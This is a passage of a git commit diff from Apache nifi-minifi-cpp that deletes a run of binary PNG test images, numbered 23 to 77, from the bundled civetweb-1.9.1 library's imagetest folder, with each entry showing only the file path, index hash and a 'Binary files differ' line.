index 3772ec5..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/23.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/24.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/24.png b/thirdparty/civetweb-1.9.1/test/imagetest/24.png deleted file mode 100644 index 2b458f9..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/24.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/25.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/25.png b/thirdparty/civetweb-1.9.1/test/imagetest/25.png deleted file mode 100644 index 53d4757..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/25.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/26.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/26.png b/thirdparty/civetweb-1.9.1/test/imagetest/26.png deleted file mode 100644 index d4a101c..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/26.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/27.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/27.png b/thirdparty/civetweb-1.9.1/test/imagetest/27.png deleted file mode 100644 index a40fc51..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/27.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/28.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/28.png b/thirdparty/civetweb-1.9.1/test/imagetest/28.png deleted file mode 100644 index 12d72a6..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/28.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/29.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/29.png b/thirdparty/civetweb-1.9.1/test/imagetest/29.png deleted file mode 100644 index 0638d45..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/29.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/30.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/30.png b/thirdparty/civetweb-1.9.1/test/imagetest/30.png deleted file mode 100644 index 2446c60..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/30.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/31.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/31.png b/thirdparty/civetweb-1.9.1/test/imagetest/31.png deleted file mode 100644 index bbcbf51..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/31.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/32.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/32.png b/thirdparty/civetweb-1.9.1/test/imagetest/32.png deleted file mode 100644 index b40f395..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/32.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/33.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/33.png b/thirdparty/civetweb-1.9.1/test/imagetest/33.png deleted file mode 100644 index 7293ea5..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/33.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/34.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/34.png b/thirdparty/civetweb-1.9.1/test/imagetest/34.png deleted file mode 100644 index fb3de9c..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/34.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/35.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/35.png b/thirdparty/civetweb-1.9.1/test/imagetest/35.png deleted file mode 100644 index 4635bb0..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/35.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/36.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/36.png b/thirdparty/civetweb-1.9.1/test/imagetest/36.png deleted file mode 100644 index 1a300ef..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/36.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/37.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/37.png b/thirdparty/civetweb-1.9.1/test/imagetest/37.png deleted file mode 100644 index 6f44faf..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/37.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/38.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/38.png b/thirdparty/civetweb-1.9.1/test/imagetest/38.png deleted file mode 100644 index 1f0b810..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/38.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/39.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/39.png b/thirdparty/civetweb-1.9.1/test/imagetest/39.png deleted file mode 100644 index 02cee96..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/39.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/40.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/40.png b/thirdparty/civetweb-1.9.1/test/imagetest/40.png deleted file mode 100644 index 5dd1fd4..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/40.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/41.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/41.png b/thirdparty/civetweb-1.9.1/test/imagetest/41.png deleted file mode 100644 index 734b9d3..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/41.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/42.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/42.png b/thirdparty/civetweb-1.9.1/test/imagetest/42.png deleted file mode 100644 index c19bc8f..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/42.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/43.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/43.png b/thirdparty/civetweb-1.9.1/test/imagetest/43.png deleted file mode 100644 index 0d58081..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/43.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/44.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/44.png b/thirdparty/civetweb-1.9.1/test/imagetest/44.png deleted file mode 100644 index 5745c68..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/44.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/45.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/45.png b/thirdparty/civetweb-1.9.1/test/imagetest/45.png deleted file mode 100644 index e8411b7..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/45.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/46.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/46.png b/thirdparty/civetweb-1.9.1/test/imagetest/46.png deleted file mode 100644 index 532d175..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/46.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/47.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/47.png b/thirdparty/civetweb-1.9.1/test/imagetest/47.png deleted file mode 100644 index ca30f6f..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/47.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/48.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/48.png b/thirdparty/civetweb-1.9.1/test/imagetest/48.png deleted file mode 100644 index 0c20c82..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/48.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/49.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/49.png b/thirdparty/civetweb-1.9.1/test/imagetest/49.png deleted file mode 100644 index a4e6799..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/49.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/50.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/50.png b/thirdparty/civetweb-1.9.1/test/imagetest/50.png deleted file mode 100644 index e78c9f1..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/50.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/51.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/51.png b/thirdparty/civetweb-1.9.1/test/imagetest/51.png deleted file mode 100644 index dd0aeb7..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/51.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/52.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/52.png b/thirdparty/civetweb-1.9.1/test/imagetest/52.png deleted file mode 100644 index 7672eef..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/52.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/53.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/53.png b/thirdparty/civetweb-1.9.1/test/imagetest/53.png deleted file mode 100644 index 5537179..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/53.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/54.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/54.png b/thirdparty/civetweb-1.9.1/test/imagetest/54.png deleted file mode 100644 index d8fb264..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/54.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/55.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/55.png b/thirdparty/civetweb-1.9.1/test/imagetest/55.png deleted file mode 100644 index cfa47a8..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/55.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/56.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/56.png b/thirdparty/civetweb-1.9.1/test/imagetest/56.png deleted file mode 100644 index 51d7bc7..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/56.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/57.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/57.png b/thirdparty/civetweb-1.9.1/test/imagetest/57.png deleted file mode 100644 index 645b8ec..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/57.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/58.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/58.png b/thirdparty/civetweb-1.9.1/test/imagetest/58.png deleted file mode 100644 index eb861f5..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/58.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/59.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/59.png b/thirdparty/civetweb-1.9.1/test/imagetest/59.png deleted file mode 100644 index d9041b5..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/59.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/60.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/60.png b/thirdparty/civetweb-1.9.1/test/imagetest/60.png deleted file mode 100644 index 8071819..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/60.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/61.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/61.png b/thirdparty/civetweb-1.9.1/test/imagetest/61.png deleted file mode 100644 index e539e1b..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/61.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/62.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/62.png b/thirdparty/civetweb-1.9.1/test/imagetest/62.png deleted file mode 100644 index 7d20d26..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/62.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/63.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/63.png b/thirdparty/civetweb-1.9.1/test/imagetest/63.png deleted file mode 100644 index 66c7391..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/63.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/64.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/64.png b/thirdparty/civetweb-1.9.1/test/imagetest/64.png deleted file mode 100644 index 34c4dff..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/64.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/65.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/65.png b/thirdparty/civetweb-1.9.1/test/imagetest/65.png deleted file mode 100644 index 9dbbb66..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/65.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/66.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/66.png b/thirdparty/civetweb-1.9.1/test/imagetest/66.png deleted file mode 100644 index 2ced8c3..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/66.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/67.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/67.png b/thirdparty/civetweb-1.9.1/test/imagetest/67.png deleted file mode 100644 index 225a716..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/67.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/68.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/68.png b/thirdparty/civetweb-1.9.1/test/imagetest/68.png deleted file mode 100644 index 2a10e83..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/68.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/69.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/69.png b/thirdparty/civetweb-1.9.1/test/imagetest/69.png deleted file mode 100644 index 37288a0..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/69.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/70.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/70.png b/thirdparty/civetweb-1.9.1/test/imagetest/70.png deleted file mode 100644 index e39da97..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/70.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/71.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/71.png b/thirdparty/civetweb-1.9.1/test/imagetest/71.png deleted file mode 100644 index 4ea682c..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/71.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/72.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/72.png b/thirdparty/civetweb-1.9.1/test/imagetest/72.png deleted file mode 100644 index ff60546..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/72.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/73.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/73.png b/thirdparty/civetweb-1.9.1/test/imagetest/73.png deleted file mode 100644 index c97a356..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/73.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/74.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/74.png b/thirdparty/civetweb-1.9.1/test/imagetest/74.png deleted file mode 100644 index 9786789..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/74.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/75.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/75.png b/thirdparty/civetweb-1.9.1/test/imagetest/75.png deleted file mode 100644 index c66094e..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/75.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/76.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/76.png b/thirdparty/civetweb-1.9.1/test/imagetest/76.png deleted file mode 100644 index 2cf1fc9..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/76.png and /dev/null differ http://git-wip-us.apache.org/repos/asf/nifi-minifi-cpp/blob/c1101f46/thirdparty/civetweb-1.9.1/test/imagetest/77.png ---------------------------------------------------------------------- diff --git a/thirdparty/civetweb-1.9.1/test/imagetest/77.png b/thirdparty/civetweb-1.9.1/test/imagetest/77.png deleted file mode 100644 index 80dd704..0000000 Binary files a/thirdparty/civetweb-1.9.1/test/imagetest/77.png and /dev/null differ
